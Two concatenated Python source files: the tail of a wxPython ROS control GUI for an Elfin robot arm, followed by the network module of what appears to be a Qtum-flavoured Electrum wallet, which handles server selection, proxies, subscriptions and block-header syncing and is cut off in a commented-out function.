self.sld_ref_link_show.SetValue(self.ref_link_name)
self.sld_end_link_show.SetValue(self.end_link_name)
self.set_links_dlg.SetPosition((self.GetPosition()[0]+150,
self.GetPosition()[1]+250))
self.set_links_dlg.ShowModal()
def update_ref_link(self, evt):
request=SetStringRequest()
request.data=self.sld_ref_link_show.GetValue()
resp=self.call_set_ref_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def update_end_link(self, evt):
request=SetStringRequest()
request.data=self.sld_end_link_show.GetValue()
resp=self.call_set_end_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def updateDisplay(self, msg):
for i in xrange(len(self.js_display)):
self.js_display[i].SetValue(msg[i])
for i in xrange(len(self.ps_display)):
self.ps_display[i].SetValue(msg[i+6])
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
self.ref_link_show.SetValue(ref_link)
self.end_link_show.SetValue(end_link)
def update_reply_show(self,msg):
if msg.success:
self.reply_show.SetBackgroundColour(wx.Colour(200, 225, 200))
else:
self.reply_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.reply_show.SetValue(msg.message)
def update_servo_state(self, msg):
if msg.data:
self.servo_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.servo_state_show.SetValue('Enabled')
else:
self.servo_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.servo_state_show.SetValue('Disabled')
def update_fault_state(self, msg):
if msg.data:
self.fault_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.fault_state_show.SetValue('Warning')
else:
self.fault_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.fault_state_show.SetValue('No Fault')
def update_velocity_scaling_show(self, msg):
self.velocity_setting_show.SetValue(str(round(msg, 2)*100)+'%') # 20201127: change the show format
def js_call_back(self, data):
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
for i in xrange(len(data.position)):
self.key.append(str(round(data.position[i]*180/math.pi, 2)))
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
self.key=[]
def monitor_status(self, evt):
self.key=[]
current_joint_values=self.group.get_current_joint_values()
for i in xrange(len(current_joint_values)):
self.key.append(str(round(current_joint_values[i]*180/math.pi, 2)))
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(ref_link, end_link, rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(ref_link, end_link, rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
def servo_state_cb(self, data):
if self.servo_state_lock.acquire():
self.servo_state=data.data
self.servo_state_lock.release()
wx.CallAfter(self.update_servo_state, data)
def fault_state_cb(self, data):
if self.fault_state_lock.acquire():
self.fault_state=data.data
self.fault_state_lock.release()
wx.CallAfter(self.update_fault_state, data)
def ref_link_name_cb(self, data):
if self.ref_link_lock.acquire():
self.ref_link_name=data.data
self.ref_link_lock.release()
def end_link_name_cb(self, data):
if self.end_link_lock.acquire():
self.end_link_name=data.data
self.end_link_lock.release()
def listen(self):
rospy.Subscriber(self.elfin_driver_ns+'enable_state', Bool, self.servo_state_cb)
rospy.Subscriber(self.elfin_driver_ns+'fault_state', Bool, self.fault_state_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'reference_link_name', String, self.ref_link_name_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'end_link_name', String, self.end_link_name_cb)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_DO_DI)
rospy.Timer(rospy.Duration(nsecs=50000000), self.set_color)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_status)
if __name__=='__main__':
rospy.init_node('elfin_gui')
app=wx.App(False)
myframe=MyFrame(parent=None,id=-1)
myframe.Show(True)
myframe.listen()
app.MainLoop()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import errno
import json
import os
import queue
import random
import re
import select
import socket
import threading
import time
from collections import defaultdict
import socks
from . import bitcoin
from . import blockchain
from . import util
from .util import print_error
from .qtum import *
from .interface import Connection, Interface
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
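# Illustrative input/output for parse_servers(); the row layout comes from the
# 'server.peers.subscribe' reply and the values below are made up:
#
#   result = [['203.0.113.5', 'electrum.example.org', ['v1.2', 's50002', 't50001', 'p10000']]]
#   parse_servers(result)
#   # -> {'electrum.example.org': {'s': '50002', 't': '50001',
#   #                              'pruning': '10000', 'version': '1.2'}}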
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
from .qtum import DEFAULT_SERVERS
if hostmap is None:
hostmap = DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'), p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
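# Round-trip example with made-up proxy settings:
#   deserialize_proxy('socks5:localhost:9050')
#   # -> {'mode': 'socks5', 'host': 'localhost', 'port': '9050'}
# serialize_proxy() of a full dict (mode, host, port, user, password) produces
# the same colon-separated string that the config stores.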
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
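# Servers are stored as 'host:port:protocol', e.g. (made-up server)
# 'electrum.example.org:50002:s' <-> ('electrum.example.org', '50002', 's').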
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote qtum_electrum
    servers; each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
self.downloading_headers = False
dir_path = os.path.join(self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
# subscriptions and requests
self.subscribed_addresses = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.requested_chunks = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r") as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w") as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
for k in list(self.blockchains.keys()):
if not self.blockchains[k].is_valid():
for server in list(self.interfaces.keys()):
interface = self.interfaces[server]
if interface.blockchain and interface.blockchain is self.blockchains[k]:
self.close_interface(interface)
del self.blockchains[k]
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
if self.interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, self.interface)
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
# self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
self.queue_request('blockchain.relayfee', [])
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
from .qtum import DEFAULT_SERVERS
out = DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
        if server not in self.interfaces and server not in self.connecting:
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.fee_estimates[i] = fee
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.get_chunk':
self.on_get_chunk(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
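    # Examples (illustrative values):
    #   get_index('blockchain.scripthash.subscribe', ['ab12cd'])
    #   # -> 'blockchain.scripthash.subscribe:ab12cd'
    #   get_index('server.banner', [])   # -> 'server.banner'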
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
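    # overload_cb() rewrites wire-level scripthash notifications back to the
    # address the caller subscribed with, using the h2addr map filled in by
    # addr_to_scripthash(), so wallet/GUI callbacks never see raw scripthashes.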
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
        # Requests need connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
def request_chunk(self, interface, index):
if index in self.requested_chunks:
return
interface.print_error("requesting chunk %d" % index)
self.queue_request('blockchain.block.get_chunk', [index], interface)
self.requested_chunks.add(index)
def on_get_chunk(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
print_error('on get chunk error', error, result, params)
return
index = params[0]
# Ignore unsolicited chunks
if index not in self.requested_chunks:
interface.print_error("received chunk %d (unsolicited)" % index)
return
else:
interface.print_error("received chunk %d" % index)
self.requested_chunks.remove(index)
connect = interface.blockchain.connect_chunk(index, result)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
height = max(height, 0)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
# print_error('[on_get_header] {} {}'.format(height, interface.mode))
if interface.request != height:
interface.print_error("unsolicited header", interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // CHUNK_SIZE)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
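    # Summary of the interface modes driven by on_get_header (descriptive only):
    #   'default'  - following the server tip via the headers subscription.
    #   'backward' - the announced header did not connect; walk back from the
    #                tip with a doubling step until a known chain is matched.
    #   'binary'   - binary-search between the last good and first bad heights
    #                to find the fork point, then join, fork or reorg.
    #   'catch_up' - download headers (or whole chunks, see request_chunk) until
    #                the local chain reaches the server tip.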
def maintain_requests(self):
for interface in list(self.interfaces.values()):
            if interface.request and time.time() - interface.req_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except (socket.error, OSError) as e:
print_error('[wait_on_sockets]', e)
return
# TODO: py3, get code from e
# code = None
# if code == errno.EINTR:
# return
# raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
pass
# b = self.blockchains[0]
# if b.get_hash(0) == bitcoin.GENESIS:
# self.downloading_headers = False
# return
# filename = b.path()
# def download_thread():
# try:
# import urllib.request, socket
# socket.setdefaulttimeout(30)
# self.print_error("downloading ", bitcoin.HEADERS_URL)
# urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
# os.rename(filename + '.tmp', filename)
# self.print_error("done.")
# except Exception:
# self.print_error("download failed. creating file", filename)
